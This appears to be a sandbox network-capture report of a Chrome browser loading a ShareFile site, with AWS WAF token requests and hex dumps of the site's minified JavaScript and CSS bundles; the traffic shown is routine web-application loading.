                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC404OUTGET /0093b71e39a6/478ed03bbf12/verify HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC449INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:13 GMT
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5d9-7ab76219092177860e7035f1
                                                                                                                                                                                                                                                                                allow: POST
                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 b542963649ffc3f71c6540a2347be55a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: YWpABI97T0b72Edq0WQjYUFY8fLWHhFcVCdmq9O7h-F8GqACA3vyDg==


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                32192.168.2.64975518.173.205.914432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC647OUTPOST /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 1250
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC1250OUTData Raw: 7b 22 65 78 69 73 74 69 6e 67 5f 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 76 48 56 2b 59 43 4b 79 41 41 41 41 3a 77 67 6b 31 61 5a 72 46 4d 77 6d 72 65 46 68 44 45 7a 57 67 6d 5a 74 42 75 6d 68 76 2b 56 2b 72 70 30 4d 41 38 66 57 46 57 4a 54 77 64 6c 75 43 4e 48 66 62 57 4f 39 74 42 6a 6a 65 63 64 4b 6d 75 45 77 50 74 74 37 78 62 2f 48 4f 47 7a 50 6e 46 6f 74 4f 54 65 2f 32 62 45 71 46 4b 45 38 4a 47 75 72 51 4b 65 6d 70 73 48 4d 71 4b 38 43 38 68 30 4c 43 4d 4f 2f 32 4d 43 33 6e 43 65 4f 71 56 73 73 6c 4b 74 6b 6d 79 66 64 4d 56 41 66 43 79 79 39 66 36 6c 75 42 31 45 30 33 4c 39 30 35 6f 71 4e 36 37 79 69 67 72 68 65 55 2b 33 59 32 31 34 36 32 59 77
                                                                                                                                                                                                                                                                                Data Ascii: {"existing_token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAvHV+YCKyAAAA:wgk1aZrFMwmreFhDEzWgmZtBumhv+V+rp0MA8fWFWJTwdluCNHfbWO9tBjjecdKmuEwPtt7xb/HOGzPnFotOTe/2bEqFKE8JGurQKempsHMqK8C8h0LCMO/2MC3nCeOqVsslKtkmyfdMVAfCyy9f6luB1E03L905oqN67yigrheU+3Y21462Yw
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                Content-Length: 852
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:13 GMT
                                                                                                                                                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-allow-methods: OPTIONS,GET,POST
                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5d9-299157895cca464b2b4859ac
                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 f41688bac877227b82b3347b2428d266.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: JnFnh8q9igc5fb_fbZXGBBTJMA01Bufc5zR--1obUTKlAr6olQLDdw==
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC852INData Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 65 39 36 61 32 61 31 36 2d 37 65 33 63 2d 34 62 39 39 2d 39 36 65 32 2d 66 34 35 61 62 37 36 62 32 38 38 35 3a 45 51 6f 41 61 48 6c 39 36 55 77 63 41 51 41 41 3a 31 2b 44 4e 35 70 49 66 7a 64 4d 50 7a 41 6b 4d 35 58 31 6a 4f 35 77 35 70 6b 46 66 73 42 37 70 50 5a 69 77 5a 61 77 68 65 5a 49 39 6b 65 32 68 45 68 2b 33 6d 77 44 41 50 6b 50 6a 56 69 58 76 58 5a 44 7a 31 53 63 69 51 42 2b 37 64 2b 65 6c 32 79 49 4c 67 4b 57 38 72 64 48 6c 54 4c 76 57 4a 6d 6a 47 65 51 62 5a 66 6a 62 68 63 56 36 75 52 58 44 7a 49 76 5a 5a 62 49 58 32 61 4c 48 46 69 5a 77 31 59 39 55 73 6a 71 6b 6d 47 6b 2b 33 50 76 5a 52 4b 50 32 46 53 33 6e 57 37 71 70 49 72 44 5a 72 67 78 54 73 76 75 59 5a 4a 2f 4e 36 30 78 35 78 2f 6b 42 6a 46 69 51 6d 50 62 53
                                                                                                                                                                                                                                                                                Data Ascii: {"token":"e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAaHl96UwcAQAA:1+DN5pIfzdMPzAkM5X1jO5w5pkFfsB7pPZiwZawheZI9ke2hEh+3mwDAPkPjViXvXZDz1SciQB+7d+el2yILgKW8rdHlTLvWJmjGeQbZfjbhcV6uRXDzIvZZbIX2aLHFiZw1Y9UsjqkmGk+3PvZRKP2FS3nW7qpIrDZrgxTsvuYZJ/N60x5x/kBjFiQmPbS


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                33192.168.2.64975813.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC581OUTGET /sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 07 Aug 2024 19:21:56 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 18:49:11 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: vM-joHHbmDCCV2ZeJrJFVRS1JWyoUtiUPD5GOmYhk7UNHRs-YNv75Q==
                                                                                                                                                                                                                                                                                Age: 83763
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                34192.168.2.64975613.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC600OUTGET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 6490
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 26 Aug 2024 12:30:04 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "fae76dae7784930e96292b65feedbc0d"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 41f60102fc29156bc5001d6646f75c02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: X8hIlvz1r6NUEABzkEF3HdqQwW33VOpoRdnztNewLU7UkGOhS2fAmg==
                                                                                                                                                                                                                                                                                Age: 45972
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC6490INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 6d 65 64 69 61 74 69 6f 6e 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 3b 72
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};r


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                35192.168.2.64975913.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC427OUTGET /sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 113304
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 07 Aug 2024 19:21:56 GMT
                                                                                                                                                                                                                                                                                ETag: "530a7b55c7f2519e38f8b06fe7b2ab6d"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 1ac3fd533bf6be1b511077f8b8e23bfc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 8kHF3KFFHZkGln-erO0ag6rIDDuzOit95CzoPEi9GQYQD0Yquypi1g==
                                                                                                                                                                                                                                                                                Age: 45972
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 61 75 64 69 74 63 6f 6c 6c 65 63 74 6f 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 42 75 74 74 6f 6e 3d 65 2e 42 75 74 74 6f 6e 2c 72 2e 44 61 74 65 50 69 63 6b 65 72 3d 65 2e 44 61 74 65 50
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{})System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Button=e.Button,r.DatePicker=e.DateP
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 75 6d 65 6e 74 73 5b 31 5d 3a 7b 6e 73 3a 5b 22 74 72 61 6e 73 6c 61 74 69 6f 6e 22 5d 2c 64 65 66 61 75 6c 74 4e 53 3a 22 74 72 61 6e 73 6c 61 74 69 6f 6e 22 7d 3b 72 65 74 75 72 6e 28 30 2c 61 2e 41 29 28 74 68 69 73 2c 72 29 2c 6e 3d 74 2e 63 61 6c 6c 28 74 68 69 73 29 2c 43 26 26 78 2e 63 61 6c 6c 28 28 30 2c 63 2e 41 29 28 6e 29 29 2c 6e 2e 64 61 74 61 3d 65 7c 7c 7b 7d 2c 6e 2e 6f 70 74 69 6f 6e 73 3d 6f 2c 76 6f 69 64 20 30 3d 3d 3d 6e 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 26 26 28 6e 2e 6f 70 74 69 6f 6e 73 2e 6b 65 79 53 65 70 61 72 61 74 6f 72 3d 22 2e 22 29 2c 76 6f 69 64 20 30 3d 3d 3d 6e 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 26 26 28 6e 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e
                                                                                                                                                                                                                                                                                Data Ascii: uments[1]:{ns:["translation"],defaultNS:"translation"};return(0,a.A)(this,r),n=t.call(this),C&&x.call((0,c.A)(n)),n.data=e||{},n.options=o,void 0===n.options.keySeparator&&(n.options.keySeparator="."),void 0===n.options.ignoreJSONStructure&&(n.options.ign
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 2c 22 6b 75 22 2c 22 6c 62 22 2c 22 6d 61 69 22 2c 22 6d 6c 22 2c 22 6d 6e 22 2c 22 6d 72 22 2c 22 6e 61 68 22 2c 22 6e 61 70 22 2c 22 6e 62 22 2c 22 6e 65 22 2c 22 6e 6c 22 2c 22 6e 6e 22 2c 22 6e 6f 22 2c 22 6e 73 6f 22 2c 22 70 61 22 2c 22 70 61 70 22 2c 22 70 6d 73 22 2c 22 70 73 22 2c 22 70 74 2d 50 54 22 2c 22 72 6d 22 2c 22 73 63 6f 22 2c 22 73 65 22 2c 22 73 69 22 2c 22 73 6f 22 2c 22 73 6f 6e 22 2c 22 73 71 22 2c 22 73 76 22 2c 22 73 77 22 2c 22 74 61 22 2c 22 74 65 22 2c 22 74 6b 22 2c 22 75 72 22 2c 22 79 6f 22 5d 2c 6e 72 3a 5b 31 2c 32 5d 2c 66 63 3a 32 7d 2c 7b 6c 6e 67 73 3a 5b 22 61 79 22 2c 22 62 6f 22 2c 22 63 67 67 22 2c 22 66 61 22 2c 22 68 74 22 2c 22 69 64 22 2c 22 6a 61 22 2c 22 6a 62 6f 22 2c 22 6b 61 22 2c 22 6b 6d 22 2c 22 6b 6f
                                                                                                                                                                                                                                                                                Data Ascii: ,"ku","lb","mai","ml","mn","mr","nah","nap","nb","ne","nl","nn","no","nso","pa","pap","pms","ps","pt-PT","rm","sco","se","si","so","son","sq","sv","sw","ta","te","tk","ur","yo"],nr:[1,2],fc:2},{lngs:["ay","bo","cgg","fa","ht","id","ja","jbo","ka","km","ko
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 35 3f 61 72 67 75 6d 65 6e 74 73 5b 35 5d 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 3e 3d 74 68 69 73 2e 6d 61 78 50 61 72 61 6c 6c 65 6c 52 65 61 64 73 3f 76 6f 69 64 20 74 68 69 73 2e 77 61 69 74 69 6e 67 52 65 61 64 73 2e 70 75 73 68 28 7b 6c 6e 67 3a 65 2c 6e 73 3a 74 2c 66 63 4e 61 6d 65 3a 72 2c 74 72 69 65 64 3a 6f 2c 77 61 69 74 3a 69 2c 63 61 6c 6c 62 61 63 6b 3a 61 7d 29 3a 28 74 68 69 73 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 2b 2b 2c 74 68 69 73 2e 62 61 63 6b 65 6e 64 5b 72 5d 28 65 2c 74 2c 28 66 75 6e 63 74 69 6f 6e 28 73 2c 63 29 7b 69 66 28 6e 2e 72 65 61 64 69 6e 67 43 61 6c 6c 73 2d 2d 2c 6e 2e 77 61
                                                                                                                                                                                                                                                                                Data Ascii: a=arguments.length>5?arguments[5]:void 0;return e.length?this.readingCalls>=this.maxParallelReads?void this.waitingReads.push({lng:e,ns:t,fcName:r,tried:o,wait:i,callback:a}):(this.readingCalls++,this.backend[r](e,t,(function(s,c){if(n.readingCalls--,n.wa
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 78 65 28 29 7b 72 65 74 75 72 6e 28 78 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                                                                                                                                                                                Data Ascii: t,r){return t in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}function xe(){return(xe=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProp
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC7624INData Raw: 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 4f 29 3a 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 4f 2c 70 28 65 2c 66 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 50 29 2c 65 7d 2c 72 2e 61 77 72 61 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 5f 5f 61 77 61 69 74 3a 65 7d 7d 2c 41 28 4c 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 28 4c 2e 70 72 6f 74 6f 74 79 70 65 2c 6c 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 29 2c 72 2e 41 73 79 6e 63 49 74 65 72
                                                                                                                                                                                                                                                                                Data Ascii: ark=function(e){return Object.setPrototypeOf?Object.setPrototypeOf(e,O):(e.__proto__=O,p(e,f,"GeneratorFunction")),e.prototype=Object.create(P),e},r.awrap=function(e){return{__await:e}},A(L.prototype),p(L.prototype,l,(function(){return this})),r.AsyncIter
                                                                                                                                                                                                                                                                                2024-10-09 18:05:13 UTC16384INData Raw: 28 6e 3d 69 2e 63 61 6c 6c 28 72 29 29 2e 64 6f 6e 65 29 26 26 28 73 2e 70 75 73 68 28 6e 2e 76 61 6c 75 65 29 2c 73 2e 6c 65 6e 67 74 68 21 3d 3d 74 29 3b 63 3d 21 30 29 3b 7d 63 61 74 63 68 28 65 29 7b 75 3d 21 30 2c 6f 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 69 66 28 21 63 26 26 6e 75 6c 6c 21 3d 72 2e 72 65 74 75 72 6e 26 26 28 61 3d 72 2e 72 65 74 75 72 6e 28 29 2c 4f 62 6a 65 63 74 28 61 29 21 3d 3d 61 29 29 72 65 74 75 72 6e 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 75 29 74 68 72 6f 77 20 6f 7d 7d 72 65 74 75 72 6e 20 73 7d 7d 28 65 2c 74 29 7c 7c 28 30 2c 6f 2e 41 29 28 65 2c 74 29 7c 7c 28 30 2c 69 2e 41 29 28 29 7d 7d 2c 38 31 36 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 72 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 6f 7d
                                                                                                                                                                                                                                                                                Data Ascii: (n=i.call(r)).done)&&(s.push(n.value),s.length!==t);c=!0);}catch(e){u=!0,o=e}finally{try{if(!c&&null!=r.return&&(a=r.return(),Object(a)!==a))return}finally{if(u)throw o}}return s}}(e,t)||(0,o.A)(e,t)||(0,i.A)()}},816:(e,t,r)=>{"use strict";r.d(t,{A:()=>o}
